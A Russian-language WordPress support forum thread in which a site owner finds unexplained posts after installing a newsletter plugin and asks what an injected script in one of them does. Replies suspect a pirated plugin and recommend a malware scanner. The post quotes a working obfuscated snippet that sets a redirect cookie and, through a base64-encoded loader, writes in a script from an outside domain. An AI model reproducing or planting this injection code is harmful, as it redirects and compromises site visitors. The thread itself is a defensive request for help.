Поддержка Проблемы и решения После установки плагина посыпался спам

  • Установил плагин для создания рассылок своим подписчикам. Добавил все электронки, написал письмо и отправил через CRON. Через день получил ответ, что письма по всем адресам были добавлены. Но вместе с тем, пришли еще 4 письма, в которых говорилось, что у меня на сайте появилась новая запись и указана ссылка на эту запись. В админке я действительно нашел 12 новых записей, которых раньше не было; я их не добавлял; доступ к админке есть только у меня. Я удалил этот модуль и похожих проблем больше не возникает.
    Все появившиеся записи от разных дат, многие были созданы раньше, чем был установлен плагин для рассылок.
    Я стал разбираться в этих записях. Одна из них в двух редакциях — от 11.06.2018 11:10 и от 15.06.2018 14:54. Причем во второй редакции добавлен код:

    <!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe-->

    Что этот код делает?

    • Тема изменена 3 года, 3 месяца назад пользователем Yui. Причина: [code]
Просмотр 7 ответов — с 1 по 7 (всего 7)
  • Установил плагин

    какой?
    И если публикует тут код его надо брать в теги code

    • Ответ изменён 3 года, 3 месяца назад пользователем O.

    У меня под подозрением два плагина:
    https://www.thenewsletterplugin.com/
    https://www.icegram.com/email-subscribers/

    1. Первый плагин есть в каталоге плагинов для WP и даже недавно обновлен. А вот второй действительно вызывает подозрение, как должно вызывать подозрение и всё остальное для WP, взятое НЕ из официальных источников.

    • Ответ изменён 3 года, 3 месяца назад пользователем O.

    второй плагин — платный.
    у меня большие сомнения, что в платный по подписке плагин могут добавить какую-то вирусную хрень.

    второй плагин — платный.
    у меня большие сомнения

    В таком случае у меня есть большие сомнения что он куплен. Скорее всего найден на какой-либо помойке с добавлением вирусной хрени
    Вот всё и сложилось.

    • Ответ изменён 3 года, 3 месяца назад пользователем O.

    Оба плагина есть в менеджере установки в самой CMS:
    https://ibb.co/kJXhrd

    ну под подозрением у вас должны быть все — и тема и плагины и даже сам движок. ибо трояны вещь такая, что засовывают вредоносный код куда только могут.

    на вашем месте я бы проверил весь сайт полностью айболитом — https://revisium.com/ai/

Просмотр 7 ответов — с 1 по 7 (всего 7)
  • Тема «После установки плагина посыпался спам» закрыта для новых ответов.